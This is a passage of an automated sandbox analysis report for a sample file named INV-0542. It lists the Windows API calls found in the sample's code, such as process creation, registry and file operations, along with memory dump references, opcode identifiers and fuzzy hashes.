                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                                                                • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                                                                                                • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                                                                • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                                                                                                APIs
                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseDeleteValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2831762973-0
                                                                                                                                                                • Opcode ID: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
                                                                                                                                                                • Instruction ID: 8adcbc206ff712accdb54216371371453b286a19eaa2ac3ec43ed269339827cd
                                                                                                                                                                • Opcode Fuzzy Hash: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
                                                                                                                                                                • Instruction Fuzzy Hash: 48F09C32A04521ABDB10BBA9DB8D5EE7265AB44354F11443FF502B71C1CAFC4D02977D
                                                                                                                                                                APIs
                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004056A9
                                                                                                                                                                  • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                                                                                                                • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2896919175-0
                                                                                                                                                                • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                                                                                                                • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                                                                                                                                                • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                                                                                                                • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3712363035-0
                                                                                                                                                                • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                                                                                                                • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                                                                                                                                • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                                                                                                                • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                                                                                                                  • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                                                                                                                  • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                                                                                                                                  • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                                • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                                                                                                                                • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                                • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                                • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                                                                • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                                • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                                                                                                                                                • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                                                                                                                                                APIs
                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                                                                                                                • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                                                                                                                                • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                                                                                                                                APIs
                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 390214022-0
                                                                                                                                                                • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                                                                                                • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                                                                                                                                                • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                                                                                                • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                                                • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                                                                                                                                                • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                                                • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                                                                                                                                                APIs
                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                                                                                                                                                • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                                                                                                                                                APIs
                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                                                                                                                                                • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                                                                                                                                                APIs
                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1096422788-0
                                                                                                                                                                • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                                • Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
                                                                                                                                                                • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                                • Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
                                                                                                                                                                APIs
